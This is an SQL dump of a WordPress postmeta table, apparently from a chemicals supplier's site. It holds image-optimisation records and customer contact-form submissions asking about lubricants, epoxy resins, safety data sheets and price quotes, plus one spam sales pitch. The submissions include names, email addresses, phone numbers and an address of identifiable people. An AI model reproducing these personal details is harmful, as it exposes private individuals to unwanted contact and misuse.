INSERT INTO `wp_postmeta` VALUES (30504, 42, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvS3J5dG94MV9vcmlnaW5hbC5wbmciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0tyeXRveDFfb3JpZ2luYWwucG5nIiwid2lkdGgiOjE5NSwiaGVpZ2h0Ijo2NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0tyeXRveDFfb3JpZ2luYWwucG5nIiwicmVkdWN0aW9uIjozMjMwLCJ0aW1lIjoxNDgzNTkyODIwLCJpZCI6IjQyIn1d'); 
INSERT INTO `wp_postmeta` VALUES (30505, 41, 'wpfc_optimisation_reduction', '1953'); 
INSERT INTO `wp_postmeta` VALUES (30506, 41, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvS3J5dG94MS5wbmciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0tyeXRveDEucG5nIiwid2lkdGgiOjE4OSwiaGVpZ2h0Ijo2OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0tyeXRveDEucG5nIiwicmVkdWN0aW9uIjoxOTUzLCJ0aW1lIjoxNDgzNTkyODI1LCJpZCI6IjQxIn1d'); 
INSERT INTO `wp_postmeta` VALUES (30507, 40, 'wpfc_optimisation_reduction', '1953'); 
INSERT INTO `wp_postmeta` VALUES (30508, 40, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvS3J5dG94XzEucG5nIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Lcnl0b3hfMS5wbmciLCJ3aWR0aCI6MTg5LCJoZWlnaHQiOjY4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvS3J5dG94XzEucG5nIiwicmVkdWN0aW9uIjoxOTUzLCJ0aW1lIjoxNDgzNTkyODMwLCJpZCI6IjQwIn1d'); 
INSERT INTO `wp_postmeta` VALUES (30509, 28, 'wpfc_optimisation_reduction', '6972'); 
INSERT INTO `wp_postmeta` VALUES (30510, 28, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnMxLnBuZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnMxLnBuZyIsIndpZHRoIjoyMjAsImhlaWdodCI6NjMsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jaGVtb3VyczEucG5nIiwicmVkdWN0aW9uIjoyOTM2LCJ0aW1lIjoxNDgzNTkyODM2LCJpZCI6IjI4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3VyczEtMjAweDYzLnBuZyIsIndpZHRoIjoyMDAsImhlaWdodCI6NjMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnMxLTIwMHg2My5wbmciLCJtaW1lX3R5cGUiOiJpbWFnZVwvcG5nIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NoZW1vdXJzMS0yMDB4NjMucG5nIiwicmVkdWN0aW9uIjoxNzEzLCJ0aW1lIjoxNDgzNTkyODM5LCJpZCI6Mjh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3VyczEtMTE0eDYzLnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzMS0xMTR4NjMucG5nIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiI2MyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jaGVtb3VyczEtMTE0eDYzLnBuZyIsInJlZHVjdGlvbiI6ODcyLCJ0aW1lIjoxNDgzNTkyODQyLCJpZCI6Mjh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3VyczEtMTgweDYzLnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzMS0xODB4NjMucG5nIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiI2MyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jaGVtb3VyczEtMTgweDYzLnBuZyIsInJlZHVjdGlvbiI6MTQ1MSwidGltZSI6MTQ4MzU5Mjg0NiwiaWQiOjI4fV0='); 
INSERT INTO `wp_postmeta` VALUES (30511, 24, 'wpfc_optimisation_reduction', '143'); 
INSERT INTO `wp_postmeta` VALUES (30512, 24, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbG9nb19tcy5wbmciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2xvZ29fbXMucG5nIiwid2lkdGgiOjE1MiwiaGVpZ2h0Ijo4MywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2xvZ29fbXMucG5nIiwicmVkdWN0aW9uIjoxNDMsInRpbWUiOjE0ODM1OTI4NTIsImlkIjoiMjQifV0='); 
INSERT INTO `wp_postmeta` VALUES (30513, 18, 'wpfc_optimisation_reduction', '2673'); 
INSERT INTO `wp_postmeta` VALUES (30514, 18, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbG9nby0zLnBuZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbG9nby0zLnBuZyIsIndpZHRoIjoxNjcsImhlaWdodCI6OTEsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9sb2dvLTMucG5nIiwicmVkdWN0aW9uIjoyNjczLCJ0aW1lIjoxNDgzNTkyODU4LCJpZCI6IjE4In1d'); 
INSERT INTO `wp_postmeta` VALUES (30515, 3397, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30516, 3397, '_seq_num', '207'); 
INSERT INTO `wp_postmeta` VALUES (30517, 3397, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30518, 3397, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30519, 3397, '_field_1', 'Mrss zhou'); 
INSERT INTO `wp_postmeta` VALUES (30520, 3397, '_field_10', 'Nanjing Panef Mechanical&amp;Electrical Technology Co., Ltd'); 
INSERT INTO `wp_postmeta` VALUES (30521, 3397, '_field_2', '13645153625@139.com'); 
INSERT INTO `wp_postmeta` VALUES (30522, 3397, '_field_8', '(136) 451-5262'); 
INSERT INTO `wp_postmeta` VALUES (30523, 3397, '_field_3', 'To China where can I buy MS - 143, if you can&#039;t buy, I use what way from other countries to buy, thank you!'); 
INSERT INTO `wp_postmeta` VALUES (30524, 3397, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30525, 3397, '_sub_id', '3397'); 
INSERT INTO `wp_postmeta` VALUES (30526, 3398, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30527, 3398, '_seq_num', '208'); 
INSERT INTO `wp_postmeta` VALUES (30528, 3398, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30529, 3398, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30530, 3398, '_field_1', 'Kan'); 
INSERT INTO `wp_postmeta` VALUES (30531, 3398, '_field_10', 'Web Speed Master'); 
INSERT INTO `wp_postmeta` VALUES (30532, 3398, '_field_2', 'info@webspeedmaster.com'); 
INSERT INTO `wp_postmeta` VALUES (30533, 3398, '_field_8', '9876543210'); 
INSERT INTO `wp_postmeta` VALUES (30534, 3398, '_field_3', 'Hi,\r\n\r\nYou probably know about how your loading speed directly affects a lot of other metrics, such as conversion rates, bounce rates and user satisfaction rates. Just by shaving off a good fraction of your loading times, you would see your SERPs being higher, traffic being higher and sales being higher.\r\n\r\nUnfortunately, as I did a quick rundown of your Site, I noticed that your Website can be optimized very easily for much faster loading speeds. My name is Kan, and I am from https://www.webspeedmaster.com/ and I have over 10 years of experience in Website Management.\r\n\r\nFrom my quick rundown, I have deduced that you are using Wordpress, which is an excellent CMS. And you are in luck, because I have some great tricks for Wordpress-based Sites, enabling them to load much more faster.\r\n\r\nAnd if you are wondering about my services, many satisfied clients have left positive reviews, and you can check them out here: https://www.webspeedmaster.com/testimonials-reviews/\r\n\r\nStop losing leads, and make use of the traffic you are getting. Improve your Website Performance now!\r\n\r\nWe would not reach you again and fill your inbox. This is just one time pitch. Anyhow, if you would like to take off your email completely, please unsubscribe here https://www.webspeedmaster.com/report/ .\r\n'); 
INSERT INTO `wp_postmeta` VALUES (30535, 3398, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30536, 3398, '_sub_id', '3398'); 
INSERT INTO `wp_postmeta` VALUES (30537, 3399, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30538, 3399, '_seq_num', '209'); 
INSERT INTO `wp_postmeta` VALUES (30539, 3399, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30540, 3399, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30541, 3399, '_field_1', 'Stefanie Yoder'); 
INSERT INTO `wp_postmeta` VALUES (30542, 3399, '_field_10', 'mSDS Source'); 
INSERT INTO `wp_postmeta` VALUES (30543, 3399, '_field_2', 'stefanie@msdssource.biz'); 
INSERT INTO `wp_postmeta` VALUES (30544, 3399, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (30545, 3399, '_field_3', 'I am writing on behalf of my customer, Southern Maine Healthcare, to obtain an SDS for one of their in-stock products. I need a safety sheet for the following product: Magnetic Tape Head Cleaner #MS-200/CO2. Please forward this document to me at your earliest convenience. Thank you!'); 
INSERT INTO `wp_postmeta` VALUES (30546, 3399, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30547, 3399, '_sub_id', '3399'); 
INSERT INTO `wp_postmeta` VALUES (30548, 3400, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (30549, 3400, '_seq_num', '190'); 
INSERT INTO `wp_postmeta` VALUES (30550, 3400, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30551, 3400, '_field_12', 'Andren J.  Appelquest'); 
INSERT INTO `wp_postmeta` VALUES (30552, 3400, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (30553, 3400, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (30554, 3400, '_field_14', 'andren@hal-pc.org'); 
INSERT INTO `wp_postmeta` VALUES (30555, 3400, '_field_15', '(281) 636-2826'); 
INSERT INTO `wp_postmeta` VALUES (30556, 3400, '_field_16', 'I got some 3M 77 spray glue on my hair, a patch about 1 sq. In.  How may I dissolve or otherwise release the hardened glue.\r\nSincerely,  Andren Appelquest'); 
INSERT INTO `wp_postmeta` VALUES (30557, 3400, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (30558, 3400, '_sub_id', '3400'); 
INSERT INTO `wp_postmeta` VALUES (30559, 3401, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30560, 3401, '_seq_num', '210'); 
INSERT INTO `wp_postmeta` VALUES (30561, 3401, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30562, 3401, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30563, 3401, '_field_1', 'eunhwa jang'); 
INSERT INTO `wp_postmeta` VALUES (30564, 3401, '_field_10', 'UMBC'); 
INSERT INTO `wp_postmeta` VALUES (30565, 3401, '_field_2', 'eunhwajang@umbc.edu'); 
INSERT INTO `wp_postmeta` VALUES (30566, 3401, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (30567, 3401, '_field_3', 'I am wondering if I can get samples of EPON 862 and Heloxy 61.\r\nAlso, the prices of them.  \r\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (30568, 3401, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30569, 3401, '_sub_id', '3401'); 
INSERT INTO `wp_postmeta` VALUES (30570, 3404, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (30571, 3404, '_seq_num', '191'); 
INSERT INTO `wp_postmeta` VALUES (30572, 3404, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30573, 3404, '_field_12', 'Richard Wu'); 
INSERT INTO `wp_postmeta` VALUES (30574, 3404, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (30575, 3404, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (30576, 3404, '_field_14', 'ninec9@hotmail.com'); 
INSERT INTO `wp_postmeta` VALUES (30577, 3404, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (30578, 3404, '_field_16', 'What is the meaning of &quot;TAN-E&quot; in table &quot;Krytox Lubricants 157 FS Fluorinated Oil&quot;?\r\n\r\nThanks very much!'); 
INSERT INTO `wp_postmeta` VALUES (30579, 3404, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (30580, 3404, '_sub_id', '3404'); 
INSERT INTO `wp_postmeta` VALUES (30581, 3405, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30582, 3405, '_seq_num', '211'); 
INSERT INTO `wp_postmeta` VALUES (30583, 3405, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30584, 3405, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30585, 3405, '_field_1', 'Kim Stefanisin'); 
INSERT INTO `wp_postmeta` VALUES (30586, 3405, '_field_10', 'Superior Manufacturing'); 
INSERT INTO `wp_postmeta` VALUES (30587, 3405, '_field_2', 'kstefanisin@checkers-safety.com'); 
INSERT INTO `wp_postmeta` VALUES (30588, 3405, '_field_8', '(708) 458-4600'); 
INSERT INTO `wp_postmeta` VALUES (30589, 3405, '_field_3', 'I am interested in MS-122SEL for use in a NBR compression molding application that has a complex design.  Is there a was I can get a sample to evaluate?'); 
INSERT INTO `wp_postmeta` VALUES (30590, 3405, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30591, 3405, '_sub_id', '3405'); 
INSERT INTO `wp_postmeta` VALUES (30592, 1368, '_oembed_132744aa53b0d4d250a9248bd36a9a41', '<blockquote data-secret="4i91caqosY" class="wp-embedded-content"><a href="https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/">Fluoropolymer Medical Coatings</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" src="https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/embed/#?secret=4i91caqosY" data-secret="4i91caqosY" width="600" height="338" title="&#8220;Fluoropolymer Medical Coatings&#8221; &#8212; Miller-Stephenson Chemicals" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (30593, 1368, '_oembed_time_132744aa53b0d4d250a9248bd36a9a41', '1483730977'); 
INSERT INTO `wp_postmeta` VALUES (30595, 3407, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30596, 3407, '_seq_num', '212'); 
INSERT INTO `wp_postmeta` VALUES (30597, 3407, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30598, 3407, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30599, 3407, '_field_1', 'PRIYA M'); 
INSERT INTO `wp_postmeta` VALUES (30600, 3407, '_field_10', 'UMAC AVIONICS PTE LIMITED'); 
INSERT INTO `wp_postmeta` VALUES (30601, 3407, '_field_2', 'tech@umacintl.com'); 
INSERT INTO `wp_postmeta` VALUES (30602, 3407, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (30603, 3407, '_field_3', 'URGENT\r\nDear Sir,\r\n \r\nPlease quote for the below given Item along with Manufacturer technical data sheet.\r\n\r\nSl No	Item Name	Quantity	Specification	Your Price\r\n1	Silkolene-762 ,Spec: O/MAT-423, Size :225 Gram 	17	Nos	\r\n2	Hylomar PL32 , Spec : O/mat 4/46 or 4/47, Size : 100 Grams tube 	400	Nos	\r\n3	Molykote 111, packing size : 1 kg can 	4	Kg	\r\n\r\nPlease confirm the below points in your quote\r\nIncoterm : \r\nCurrency : \r\nManufacturer name:\r\nManufacturer COC:\r\nWarranty period:\r\nDelivery period:\r\n\r\nWITH REGARDS, \r\nPriya\r\n\r\nUMAC AVIONICS PTE LIMITED\r\n391B ORCHARD ROAD\r\n#23-01 NGEE ANN CITY TOWER B, \r\nSINGAPORE - 238874.\r\nTelefax : +65 68464085\r\nwww.umacintl.com\r\nEmail: tech@umacintl.com\r\n\r\n\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (30604, 3407, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30605, 3407, '_sub_id', '3407'); 
INSERT INTO `wp_postmeta` VALUES (30606, 3408, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (30607, 3408, '_seq_num', '192'); 
INSERT INTO `wp_postmeta` VALUES (30608, 3408, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30609, 3408, '_field_12', 'Ali mulumbi'); 
INSERT INTO `wp_postmeta` VALUES (30610, 3408, '_field_13', 'Ndugu transport co.'); 
INSERT INTO `wp_postmeta` VALUES (30611, 3408, '_field_18', 'Supplies agent'); 
INSERT INTO `wp_postmeta` VALUES (30612, 3408, '_field_14', 'Mulumbia13@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (30613, 3408, '_field_15', '+254724322306'); 
INSERT INTO `wp_postmeta` VALUES (30614, 3408, '_field_16', 'Registration'); 
INSERT INTO `wp_postmeta` VALUES (30615, 3408, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (30616, 3408, '_sub_id', '3408'); 
INSERT INTO `wp_postmeta` VALUES (30617, 3409, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30618, 3409, '_seq_num', '213'); 
INSERT INTO `wp_postmeta` VALUES (30619, 3409, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30620, 3409, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30621, 3409, '_field_1', 'Anthony Buonomo'); 
INSERT INTO `wp_postmeta` VALUES (30622, 3409, '_field_10', 'Applied Research Laboratory, University of Texas'); 
INSERT INTO `wp_postmeta` VALUES (30623, 3409, '_field_2', 'buonomo@arlut.utexas.edu'); 
INSERT INTO `wp_postmeta` VALUES (30624, 3409, '_field_8', '(512) 835-3431'); 
INSERT INTO `wp_postmeta` VALUES (30625, 3409, '_field_3', 'Please provide a quote with lead time for the following:\r\n2 quarts, EPON Epoxy Resin 815C \r\n2 quarts, TETA Epikure Curing Agent 3234\r\nInclude a certificate of conformance.\r\n\r\nThank you.\r\n\r\nAnthony M. Buonomo\r\n512.835.3431\r\nbuonomo@arlut.utexas.edu\r\n\r\nApplied Research Laboratories\r\nThe University of Texas at Austin\r\n10000 Burnett Road'); 
INSERT INTO `wp_postmeta` VALUES (30626, 3409, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30627, 3409, '_sub_id', '3409'); 
INSERT INTO `wp_postmeta` VALUES (30628, 3411, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30629, 3411, '_seq_num', '214'); 
INSERT INTO `wp_postmeta` VALUES (30630, 3411, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30631, 3411, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30632, 3411, '_field_1', 'Hande Akseki'); 
INSERT INTO `wp_postmeta` VALUES (30633, 3411, '_field_10', 'Pratt and Whitney Canada'); 
INSERT INTO `wp_postmeta` VALUES (30634, 3411, '_field_2', 'hande.akseki@pwc.ca'); 
INSERT INTO `wp_postmeta` VALUES (30635, 3411, '_field_8', '(905) 564-7500'); 
INSERT INTO `wp_postmeta` VALUES (30636, 3411, '_field_3', 'Hello,\n\nI also left a voicemail about this issue few minutes ago.\n\nWe would like to understand  MS-122SE comparability to MS-122XD which is already qualified to our specification.\n\nCould you please forward me the SDS and TDS and outline the main differences between these two products?\n\nYou can reach me via email at hande.akseki@pwc.ca or phone at 905-564-7500 with extension 64018\n\nThank you,\n\nHande Akseki\n'); 
INSERT INTO `wp_postmeta` VALUES (30637, 3411, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30638, 3411, '_sub_id', '3411'); 
INSERT INTO `wp_postmeta` VALUES (30639, 3412, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (30640, 3412, '_seq_num', '193'); 
INSERT INTO `wp_postmeta` VALUES (30641, 3412, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30642, 3412, '_field_12', 'Mike Milovanovic'); 
INSERT INTO `wp_postmeta` VALUES (30643, 3412, '_field_13', 'Parker Hanifin '); 
INSERT INTO `wp_postmeta` VALUES (30644, 3412, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (30645, 3412, '_field_14', 'mmilovanovic@parker.com'); 
INSERT INTO `wp_postmeta` VALUES (30646, 3412, '_field_15', '(847) 955-5260'); 
INSERT INTO `wp_postmeta` VALUES (30647, 3412, '_field_16', 'Hi,I am trying to order some MS-580 and am being told that it has been replaced by MS-580N.\ncould you please explain the difference and also could I have MSDS&#039;s for both of these to compare them.\n\nThanks,\nMike'); 
INSERT INTO `wp_postmeta` VALUES (30648, 3412, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (30649, 3412, '_sub_id', '3412'); 
INSERT INTO `wp_postmeta` VALUES (30650, 3413, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30651, 3413, '_seq_num', '215'); 
INSERT INTO `wp_postmeta` VALUES (30652, 3413, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30653, 3413, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30654, 3413, '_field_1', 'Matthew Conley'); 
INSERT INTO `wp_postmeta` VALUES (30655, 3413, '_field_10', 'University of California, Riverside'); 
INSERT INTO `wp_postmeta` VALUES (30656, 3413, '_field_2', 'mconley@ucr.edu'); 
INSERT INTO `wp_postmeta` VALUES (30657, 3413, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (30658, 3413, '_field_3', 'I run an academic research group at the University of California, Riverside. We use Krytox LVP for various applications in our research.  I am interested in purchasing a fairly large quantity of the LVP grease. Could you send me pricing information for 20, 50, and 100 units of LVP grease? Any academic discount would be greatly appreciated.\r\nThank you for your help\r\nMatt'); 
INSERT INTO `wp_postmeta` VALUES (30659, 3413, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30660, 3413, '_sub_id', '3413'); 
INSERT INTO `wp_postmeta` VALUES (30661, 3414, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30662, 3414, '_seq_num', '216'); 
INSERT INTO `wp_postmeta` VALUES (30663, 3414, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30664, 3414, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30665, 3414, '_field_1', 'Ira Lobos'); 
INSERT INTO `wp_postmeta` VALUES (30666, 3414, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (30667, 3414, '_field_2', 'i.lobos@hotmail.cl'); 
INSERT INTO `wp_postmeta` VALUES (30668, 3414, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (30669, 3414, '_field_3', 'Greetings\r\n\r\nI am looking for release agents, and I was wondering if i can get a quotation for ten cans of MS-122AD (PTFE release agent).  I need a good release agent for Carbon fibre applications, and information for prices. If you possibly could help me, I would appreciate it.\r\n\r\nBest Regards '); 
INSERT INTO `wp_postmeta` VALUES (30670, 3414, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30671, 3414, '_sub_id', '3414'); 
INSERT INTO `wp_postmeta` VALUES (30672, 1338, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (30673, 1338, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (30674, 3415, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30675, 3415, '_seq_num', '217'); 
INSERT INTO `wp_postmeta` VALUES (30676, 3415, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30677, 3415, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30678, 3415, '_field_1', 'Estella Fang'); 
INSERT INTO `wp_postmeta` VALUES (30679, 3415, '_field_10', 'Double Bond Chemical'); 
INSERT INTO `wp_postmeta` VALUES (30680, 3415, '_field_2', 'fyy100013@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (30681, 3415, '_field_8', '(315) 751-3545'); 
